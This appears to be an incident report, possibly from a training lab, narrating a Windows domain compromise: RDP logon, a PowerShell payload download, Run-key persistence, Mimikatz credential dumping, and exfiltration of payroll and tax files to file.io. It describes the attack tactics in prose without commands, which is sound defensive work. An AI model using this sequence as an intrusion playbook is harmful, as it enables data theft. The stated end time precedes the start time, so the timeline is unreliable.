We experienced a Critical Security Breach involving confirmed data exfiltration and the compromise of our core identity infrastructure. The incident began on 2025-10-07 04:13:08 UTC and End Time 2025-07-10 08:11:59 UTC, culminated in the exfiltration of sensitive files, confirming unauthorized access for approximately four hours. The attacker bypassed security controls, stole domain administrator credentials, and uploaded confidential Financial, Tax, and Payroll documents to a cloud storage service. This incident is classified as Catastrophic due to the confirmed loss of regulated data and compromise of our Active Directory. Immediate action is required to contain the threat and prevent further domain integrity loss.
The Attacker successfully logged in using the administrator account on mts-contractorpc1, via an interactive RDP session (Logon Type 10).
Built-in windows tool PowerShell was used to download a scripted payload from the internet via the attacker’s C2 infrastructure on (non-standard port). The file used a name masquerading as a legitimate security update and had a .ps1 extension.
A script was executed to add exclusions for multiple processes and file paths, likely to prevent security tools from detecting malicious activity.
A malicious executable was staged in a publicly writable/permissive directory and a Registry Run key was created that referenced a hidden PowerShell command, ensuring the payload executes at user logon.
Changes to the registry to maintain persistence modifying registry key to Run a malicious payload by masquerading a benign OneStandalone to hide malicious entry among legitimate startup items.
A credential-dumping binary (likely Mimikatz) was downloaded via the C2 mechanism and executed to read sensitive information from LSASS memory.
Sensitive company files (tax, finance, payroll, bank information) were opened (via Notepad), aggregated into an archive named
backup.zip, and uploaded to a cloud storage service (file.io) for exfiltration.
Administrator account logon to mts-contractorpc1 and moved laterally to the Domain Controller mts-dc.mts.local, and several files were accessed and exfiltrated.
Full Domain Compromise to steal sensitive financial and personnel data, including Tax documents, Payroll, and bank information, subsequently leading to data exfiltration.